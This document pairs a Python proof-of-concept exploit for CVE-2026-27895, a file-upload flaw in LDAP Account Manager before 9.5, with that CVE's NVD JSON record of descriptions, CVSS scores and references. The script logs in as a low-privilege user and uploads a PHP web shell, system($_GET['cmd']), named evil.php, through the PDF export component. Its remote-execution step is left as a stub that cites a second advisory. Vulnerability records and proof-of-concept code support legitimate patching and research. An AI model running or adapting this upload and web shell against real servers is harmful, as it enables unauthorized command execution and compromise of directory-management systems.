CVE-2026-27895

#!/usr/bin/env python3 """ CVE-2026-27895 - LDAP Account Manager File Upload RCE PoC Note: This is a conceptual PoC for educational purposes only. Requires valid low-privilege credentials and target running LAM < 9.5 """ import requests import sys # Target configuration TARGET_URL = "http://target-server/lam" # Replace with actual target USERNAME = "attacker" # Low-privilege user PASSWORD = "password" def create_php_payload(): """Generate malicious PHP payload""" return b"<?php system($_GET['cmd']); ?>" def upload_malicious_file(): """ Upload malicious PHP file via PDF export component """ session = requests.Session() # Step 1: Authenticate login_url = f"{TARGET_URL}/login" login_data = { "username": USERNAME, "password": PASSWORD } try: response = session.post(login_url, data=login_data, timeout=10) print(f"[+] Login attempt completed. Status: {response.status_code}") except requests.RequestException as e: print(f"[-] Login failed: {e}") return None # Step 2: Upload malicious file via PDF export pdf_export_url = f"{TARGET_URL}/pdf/export" files = { 'file': ('evil.php', create_php_payload(), 'application/octet-stream') } try: response = session.post(pdf_export_url, files=files, timeout=10) print(f"[+] File upload attempt completed. Status: {response.status_code}") if response.status_code == 200: print("[+] Malicious file may have been uploaded") return True except requests.RequestException as e: print(f"[-] Upload failed: {e}") return None return False def execute_rce(): """ Execute uploaded PHP file (requires GHSA-w7xq-vjr3-p9cf) """ # This step depends on the specific conditions print("[*] RCE execution requires additional conditions (see GHSA-w7xq-vjr3-p9cf)") pass if __name__ == "__main__": print("[*] CVE-2026-27895 PoC - LDAP Account Manager File Upload") print("[*] Target: " + TARGET_URL) upload_malicious_file()

{"cve": {"id": "CVE-2026-27895", "sourceIdentifier": "[email protected]", "published": "2026-03-18T00:16:19.780", "lastModified": "2026-03-23T18:02:27.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. Prior to version 9.5, the PDF export component does not correctly validate uploaded file extensions. This way any file type (including .php files) can be uploaded. With GHSA-w7xq-vjr3-p9cf, an attacker can achieve remote code execution as the web server user. Version 9.5 fixes the issue. Although upgrading is recommended, a workaround would be to make /var/lib/ldap-account-manager/config read-only for the web-server user."}, {"lang": "es", "value": "LDAP Account Manager (LAM) es una interfaz web para gestionar entradas (por ejemplo, usuarios, grupos, configuraciones DHCP) almacenadas en un directorio LDAP. Antes de la versión 9.5, el componente de exportación de PDF no valida correctamente las extensiones de archivo subidas. De esta manera, cualquier tipo de archivo (incluyendo archivos .PHP) puede ser subido. Con GHSA-w7xq-vjr3-p9cf, un atacante puede lograr la ejecución remota de código como el usuario del servidor web. La versión 9.5 corrige el problema. Aunque se recomienda actualizar, una solución alternativa sería hacer /var/lib/ldap-account-manager/config de solo lectura para el usuario del servidor web."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-185"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.5", "versionEndExcluding": "9.5", "matchCriteriaId": "AE4B2694-9F5E-4E6F-8EE8-AE2617E1BD5F"}]}]}], "references": [{"url": "https://github.com/LDAPAccountManager/lam/releases/tag/9.5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-88hf-2cjm-m9g8", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-w7xq-vjr3-p9cf", "source": "[email protected]", "tags": ["Not Applicable"]}]}}